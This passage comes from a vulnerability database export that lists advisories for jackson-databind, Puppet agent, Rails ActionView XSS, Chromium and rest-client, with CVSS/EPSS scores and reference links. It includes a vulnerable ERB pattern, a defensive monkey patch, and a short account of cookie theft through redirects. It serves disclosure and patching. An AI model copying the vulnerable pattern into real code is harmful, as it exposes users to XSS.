FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14062.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14062.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-14062
reference_id
reference_type
scores
0
value 0.07334
scoring_system epss
scoring_elements 0.91699
published_at 2026-04-13T12:55:00Z
1
value 0.07334
scoring_system epss
scoring_elements 0.91703
published_at 2026-04-12T12:55:00Z
2
value 0.07334
scoring_system epss
scoring_elements 0.91701
published_at 2026-04-11T12:55:00Z
3
value 0.07334
scoring_system epss
scoring_elements 0.91697
published_at 2026-04-09T12:55:00Z
4
value 0.07334
scoring_system epss
scoring_elements 0.9169
published_at 2026-04-08T12:55:00Z
5
value 0.07334
scoring_system epss
scoring_elements 0.91663
published_at 2026-04-02T12:55:00Z
6
value 0.07334
scoring_system epss
scoring_elements 0.91656
published_at 2026-04-01T12:55:00Z
7
value 0.07334
scoring_system epss
scoring_elements 0.91678
published_at 2026-04-07T12:55:00Z
8
value 0.07334
scoring_system epss
scoring_elements 0.91669
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-14062
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14062
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14062
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70
5
reference_url https://github.com/FasterXML/jackson-databind/commit/99001cdb6807b5c7b170ec6a9092ecbb618ae79c
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/99001cdb6807b5c7b170ec6a9092ecbb618ae79c
6
reference_url https://github.com/FasterXML/jackson-databind/issues/2704
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2704
7
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
8
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-14062
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-14062
10
reference_url https://security.netapp.com/advisory/ntap-20200702-0003
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200702-0003
11
reference_url https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625
12
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
13
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
14
reference_url https://www.oracle.com//security-alerts/cpujul2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com//security-alerts/cpujul2021.html
15
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
16
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1848962
reference_id 1848962
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1848962
18
reference_url https://github.com/advisories/GHSA-c265-37vj-cwcc
reference_id GHSA-c265-37vj-cwcc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c265-37vj-cwcc
19
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
20
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
21
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
22
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
23
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-14062, GHSA-c265-37vj-cwcc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uygc-h93v-vuh8
72
url VCID-v61q-45uv-uuf7
vulnerability_id VCID-v61q-45uv-uuf7
summary puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-11751.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-11751.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-11751
reference_id
reference_type
scores
0
value 0.00223
scoring_system epss
scoring_elements 0.44826
published_at 2026-04-01T12:55:00Z
1
value 0.00223
scoring_system epss
scoring_elements 0.44909
published_at 2026-04-02T12:55:00Z
2
value 0.00223
scoring_system epss
scoring_elements 0.44928
published_at 2026-04-04T12:55:00Z
3
value 0.00223
scoring_system epss
scoring_elements 0.44869
published_at 2026-04-07T12:55:00Z
4
value 0.00223
scoring_system epss
scoring_elements 0.44922
published_at 2026-04-08T12:55:00Z
5
value 0.00223
scoring_system epss
scoring_elements 0.44924
published_at 2026-04-09T12:55:00Z
6
value 0.00223
scoring_system epss
scoring_elements 0.44945
published_at 2026-04-11T12:55:00Z
7
value 0.00223
scoring_system epss
scoring_elements 0.44913
published_at 2026-04-12T12:55:00Z
8
value 0.00223
scoring_system epss
scoring_elements 0.44915
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-11751
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1788261
reference_id 1788261
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1788261
3
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2018-11751
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v61q-45uv-uuf7
73
url VCID-v9mt-t1pb-hybk
vulnerability_id VCID-v9mt-t1pb-hybk
summary 
Cross site scripting vulnerability in ActionView
There is a possible cross site scripting (XSS) vulnerability in ActionView's JavaScript literal escape helpers.  Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks.

### Impact

There is a possible XSS vulnerability in the `j` and `escape_javascript` methods in ActionView.  These methods are used for escaping JavaScript string literals.  Impacted code will look something like this:

```erb
<script>let a = `<%= j unknown_input %>`</script>
```

or

```erb
<script>let a = `<%= escape_javascript unknown_input %>`</script>
```

### Releases

The 6.0.2.2 and 5.2.4.2 releases are available at the normal locations.

### Workarounds

For those that can't upgrade, the following monkey patch may be used:

```ruby
ActionView::Helpers::JavaScriptHelper::JS_ESCAPE_MAP.merge!(
  {
    "`" => "\\`",
    "$" => "\\$"
  }
)

module ActionView::Helpers::JavaScriptHelper
  alias :old_ej :escape_javascript
  alias :old_j :j

  def escape_javascript(javascript)
    javascript = javascript.to_s
    if javascript.empty?
      result = ""
    else
      result = javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r"']|[`]|[$])/u, JS_ESCAPE_MAP)
    end
    javascript.html_safe? ? result.html_safe : result
  end

  alias :j :escape_javascript
end
```

### Patches

To aid users who aren't able to upgrade immediately we have provided patches for
the two supported release series. They are in git-am format and consist of a
single changeset.

* [5-2-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-5-2-js-helper-xss-patch) - Patch for 5.2 series
* [6-0-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-6-0-js-helper-xss-patch) - Patch for 6.0 series

Please note that only the 5.2 and 6.0 series are supported at present. Users
of earlier unsupported releases are advised to upgrade as soon as possible as we
cannot guarantee the continued availability of security fixes for unsupported
releases.

### Credits

Thanks to Jesse Campos from Chef Secure
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00019.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00019.html
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5267.json
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5267.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-5267
reference_id
reference_type
scores
0
value 0.00887
scoring_system epss
scoring_elements 0.75441
published_at 2026-04-04T12:55:00Z
1
value 0.00887
scoring_system epss
scoring_elements 0.75461
published_at 2026-04-13T12:55:00Z
2
value 0.00887
scoring_system epss
scoring_elements 0.75472
published_at 2026-04-12T12:55:00Z
3
value 0.00887
scoring_system epss
scoring_elements 0.75493
published_at 2026-04-11T12:55:00Z
4
value 0.00887
scoring_system epss
scoring_elements 0.75474
published_at 2026-04-09T12:55:00Z
5
value 0.00887
scoring_system epss
scoring_elements 0.75406
published_at 2026-04-01T12:55:00Z
6
value 0.00887
scoring_system epss
scoring_elements 0.75465
published_at 2026-04-08T12:55:00Z
7
value 0.00887
scoring_system epss
scoring_elements 0.75422
published_at 2026-04-07T12:55:00Z
8
value 0.00887
scoring_system epss
scoring_elements 0.75409
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-5267
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5267
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5267
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://github.com/rails/rails/commit/033a738817abd6e446e1b320cb7d1a5c15224e9a
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails/commit/033a738817abd6e446e1b320cb7d1a5c15224e9a
6
reference_url https://github.com/rails/rails/security/advisories/GHSA-65cv-r6x7-79hv
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails/security/advisories/GHSA-65cv-r6x7-79hv
7
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-5267.yml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-5267.yml
8
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3
scoring_elements
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8
9
reference_url https://lists.debian.org/debian-lts-announce/2020/03/msg00022.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/03/msg00022.html
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-5267
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:S/C:N/I:P/A:N
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-5267
14
reference_url http://www.openwall.com/lists/oss-security/2020/03/19/1
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2020/03/19/1
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1831528
reference_id 1831528
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1831528
16
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=954304
reference_id 954304
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=954304
17
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:rubyonrails:actionview:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:rubyonrails:actionview:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:rubyonrails:actionview:*:*:*:*:*:*:*:*
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
reference_id cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
21
reference_url https://github.com/advisories/GHSA-65cv-r6x7-79hv
reference_id GHSA-65cv-r6x7-79hv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65cv-r6x7-79hv
22
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-5267, GHSA-65cv-r6x7-79hv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v9mt-t1pb-hybk
74
url VCID-va8w-uzhc-x3bz
vulnerability_id VCID-va8w-uzhc-x3bz
summary security update
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2013-6668.json
reference_id
reference_type
scores
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2013-6668.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2013-6668
reference_id
reference_type
scores
0
value 0.1282
scoring_system epss
scoring_elements 0.93988
published_at 2026-04-01T12:55:00Z
1
value 0.1282
scoring_system epss
scoring_elements 0.93998
published_at 2026-04-02T12:55:00Z
2
value 0.1282
scoring_system epss
scoring_elements 0.94006
published_at 2026-04-04T12:55:00Z
3
value 0.1282
scoring_system epss
scoring_elements 0.94009
published_at 2026-04-07T12:55:00Z
4
value 0.1282
scoring_system epss
scoring_elements 0.94018
published_at 2026-04-08T12:55:00Z
5
value 0.1282
scoring_system epss
scoring_elements 0.94022
published_at 2026-04-09T12:55:00Z
6
value 0.1282
scoring_system epss
scoring_elements 0.94027
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2013-6668
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6653
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6653
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6654
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6654
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6655
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6655
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6656
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6656
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6657
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6657
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6658
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6658
8
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6659
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6659
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6660
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6660
10
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6661
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6661
11
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6663
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6663
12
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6664
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6664
13
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6665
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6665
14
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6666
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6666
15
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6667
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6667
16
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6668
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6668
17
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1700
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1700
18
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1701
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1701
19
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1702
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1702
20
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1703
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1703
21
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1704
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1704
22
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1705
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1705
23
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1713
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1713
24
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1715
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1715
25
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1074737
reference_id 1074737
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1074737
26
reference_url https://security.gentoo.org/glsa/201403-01
reference_id GLSA-201403-01
reference_type
scores
url https://security.gentoo.org/glsa/201403-01
27
reference_url https://access.redhat.com/errata/RHSA-2014:1744
reference_id RHSA-2014:1744
reference_type
scores
url https://access.redhat.com/errata/RHSA-2014:1744
fixed_packages
aliases CVE-2013-6668
risk_score 0.1
exploitability 0.5
weighted_severity 0.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-va8w-uzhc-x3bz
75
url VCID-vhdm-w6p1-uuh9
vulnerability_id VCID-vhdm-w6p1-uuh9
summary 
Session fixation vulnerability via Set-Cookie headers
The package rest-client in `abstract_response.rb` improperly handles `Set-Cookie` headers on HTTP redirection responses. Any cookies will be forwarded to the redirection target regardless of domain, path, or expiration. If you control a redirection source, you can cause rest-client to perform a request to any third-party domain with cookies of your choosing, which may be useful in performing a session fixation attack. If you control a redirection target, you can steal any cookies set by the third-party redirection request.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-1820.json
reference_id
reference_type
scores
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-1820.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2015-1820
reference_id
reference_type
scores
0
value 0.03723
scoring_system epss
scoring_elements 0.87929
published_at 2026-04-01T12:55:00Z
1
value 0.03723
scoring_system epss
scoring_elements 0.87987
published_at 2026-04-13T12:55:00Z
2
value 0.03723
scoring_system epss
scoring_elements 0.87995
published_at 2026-04-11T12:55:00Z
3
value 0.03723
scoring_system epss
scoring_elements 0.87984
published_at 2026-04-09T12:55:00Z
4
value 0.03723
scoring_system epss
scoring_elements 0.87977
published_at 2026-04-08T12:55:00Z
5
value 0.03723
scoring_system epss
scoring_elements 0.87956
published_at 2026-04-07T12:55:00Z
6
value 0.03723
scoring_system epss
scoring_elements 0.87952
published_at 2026-04-04T12:55:00Z
7
value 0.03723
scoring_system epss
scoring_elements 0.87939
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2015-1820
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1205291
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1205291
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1820
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1820
4
reference_url https://github.com/rest-client/rest-client
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rest-client/rest-client
5
reference_url https://github.com/rest-client/rest-client/issues/369
reference_id
reference_type
scores
0
value 9.8
